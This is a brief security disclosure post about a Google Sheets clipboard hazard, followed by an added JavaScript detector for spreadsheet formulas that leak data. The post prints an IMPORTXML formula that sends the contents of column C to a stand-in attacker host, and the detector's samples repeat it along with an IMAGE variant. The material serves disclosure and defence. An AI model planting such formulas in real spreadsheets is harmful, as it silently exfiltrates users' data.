Clipboard hazard with Google Sheets

=IMPORTXML(CONCAT("https://attacker.controller.path/";CONCATENATE($C:$C)); "/root")
  • #1: modify range(s) of a document to which the attacker has only read-only access. Full control over the content.
  • #2: exfiltrate data from a document that the attacker has no access to (but knows the ID of the document).
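
The formula above builds the IMPORTXML URL from the cells of column C, so evaluating it sends that data to an external host. As an added example (not from the original post), the JavaScript below inspects text before it is pasted into a sheet and flags formulas of that shape; the function names and the sample cells other than the first are constructed for illustration.

```javascript
// Added example, not the author's code: flag formulas whose external-fetch URL
// is built from cell references, the shape of the IMPORTXML formula above.
const CALL = /\b(IMPORTXML|IMPORTHTML|IMPORTDATA|IMPORTFEED|IMAGE)\s*\(/gi;
// A1-style cell (C5, $C$5) or whole-column range (C:C, $C:$C), not a function name.
const REF = /(?<![A-Z0-9_$])(?:\$?[A-Z]{1,3}\$?\d+|\$?[A-Z]{1,3}:\$?[A-Z]{1,3})(?![A-Z0-9_(])/i;

// Blank out string literals (same length) so their content is never parsed.
function maskStrings(formula) {
  return formula.replace(/"(?:[^"]|"")*"/g, (s) => '"' + " ".repeat(s.length - 2) + '"');
}

// Text of the first argument of the call whose "(" is at openIdx.
function firstArgument(masked, openIdx) {
  let depth = 0;
  for (let i = openIdx; i < masked.length; i++) {
    const ch = masked[i];
    if (ch === "(") depth++;
    else if (ch === ")" && --depth === 0) return masked.slice(openIdx + 1, i);
    else if ((ch === "," || ch === ";") && depth === 1) return masked.slice(openIdx + 1, i);
  }
  return masked.slice(openIdx + 1); // unbalanced input: inspect the remainder
}

// Return one finding per fetch call whose URL argument references cells.
function findExfilFormulas(cells) {
  const findings = [];
  for (const text of cells) {
    if (!text.trimStart().startsWith("=")) continue; // plain text is not evaluated
    const masked = maskStrings(text);
    for (const m of masked.matchAll(CALL)) {
      const urlArg = firstArgument(masked, m.index + m[0].length - 1);
      if (REF.test(urlArg)) findings.push({ formula: text, func: m[1].toUpperCase() });
    }
  }
  return findings;
}

// First entry is the formula from this page; the rest are constructed samples.
const SAMPLE_CELLS = [
  '=IMPORTXML(CONCAT("https://attacker.controller.path/";CONCATENATE($C:$C)); "/root")',
  '=IMPORTXML("https://example.com/feed.xml", "//item/title")',
  '=SUM(C1:C10)',
  '=IMAGE("https://example.com/p.png?d=" & B2)',
  'IMPORTXML(A1)',
];
console.log(findExfilFormulas(SAMPLE_CELLS));
```

The check only sees literal A1-style references in the URL argument; named ranges and references resolved at run time are outside what it detects.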

Imre Rad

Software developer by day, security researcher in free time